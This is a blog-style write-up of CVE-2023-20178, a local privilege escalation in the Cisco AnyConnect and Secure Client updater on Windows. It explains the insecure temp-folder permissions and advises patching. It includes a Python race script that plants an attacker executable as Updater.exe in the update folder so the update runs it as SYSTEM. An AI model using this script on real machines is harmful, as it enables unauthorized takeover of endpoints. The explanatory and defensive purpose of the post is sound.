CVE-2023-20178 - Escalating to SYSTEM via Cisco AnyConnect Windows Client Update
CVE-2023-20178 is a critical privilege escalation vulnerability that affects the update process in both Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows. Attackers with low privileges can become SYSTEM—a level of control that lets them do anything on the target machine. In this post, we'll break down what this vulnerability is, why it happens, and how attackers can exploit it. You’ll also see code snippets and recommendations for patching.
What Is CVE-2023-20178?
This vulnerability lets a local, authenticated attacker gain SYSTEM rights. Here’s how: When the Cisco VPN client runs its update process after VPN connection, it creates a temporary directory without assigning secure permissions. Because of this, attackers on the machine can sneak in and plant their own files, which the update process then runs with SYSTEM privileges.
Cisco Secure Client for Windows
> 🚨 Note: This flaw does _not_ affect the Linux or macOS versions.
How Does the Vulnerability Work?
During the update process, Cisco’s client creates a folder like C:\Windows\Temp\CiscoXXXXXX and gives it permissions that let regular users alter its contents.
If an attacker predicts or quickly monitors the folder creation, they can race to drop a malicious file (like a DLL or binary). When the update process runs, it does so with SYSTEM permissions and will execute attacker’s file, handing them top-level access.
Let’s build a simple, educational example to demonstrate the issue
import os
import time
import shutil
TEMP_DIR = r"C:\Windows\Temp"
TARGET_DIR_NAME = "Cisco" # Real dir will look like "Cisco123456"
EVIL_EXE = r"C:\Evil\exploit.exe"
def find_latest_cisco_temp():
entries = [f for f in os.listdir(TEMP_DIR) if f.startswith(TARGET_DIR_NAME)]
latest = max(entries, key=lambda f: os.path.getctime(os.path.join(TEMP_DIR, f)), default=None)
return os.path.join(TEMP_DIR, latest) if latest else None
print("[*] Watching for Cisco install temp folder...")
while True:
target = find_latest_cisco_temp()
if target:
print(f"[*] Attacking folder: {target}")
try:
shutil.copy(EVIL_EXE, os.path.join(target, "Updater.exe"))
print("[+] Planted evil Updater.exe!")
break
except Exception as e:
print(f"[-] Failed to write: {e}")
time.sleep(1)
Explanation: This script waits for the Cisco update temp folder, then copies our fake Updater.exe into it. If Cisco runs this as SYSTEM during the update, it gives us full control.
Attacker must be already logged in with a valid (low-privileged) account.
- Target must have a vulnerable version of Cisco client and run an update (usually right after connecting to VPN).
Exploit Details
Why did this happen?
The update process uses insecure defaults when creating folders (sometimes Everyone or Authenticated Users can write).
Original References
- Cisco Security Advisory: cisco-sa-anyconnect-privesc-7hGk2w7z
- NVD Entry (CVE-2023-20178)
- CERT/CC Vulnerability Note VU#586125
How to Defend Against CVE-2023-20178
Best Solution:
- Update Cisco AnyConnect Secure Mobility Client for Windows and Cisco Secure Client for Windows to the latest version ASAP. (Download from Cisco Software Downloads)
Temporary Workarounds
- Limit physical/remote access to endpoints with Cisco software
Conclusion
CVE-2023-20178 demonstrates how dangerous it is to assign insecure permissions, even on “temporary” folders. Attackers don’t need administrator rights—just a little patience and knowledge. If your organization runs Cisco VPN on Windows, patch immediately to avoid attackers moving from standard user to full SYSTEM.
> Stay aware. Secure installs matter—even for routine client updates!
Timeline
Published on: 06/28/2023 15:15:00 UTC
Last modified on: 07/12/2023 14:15:00 UTC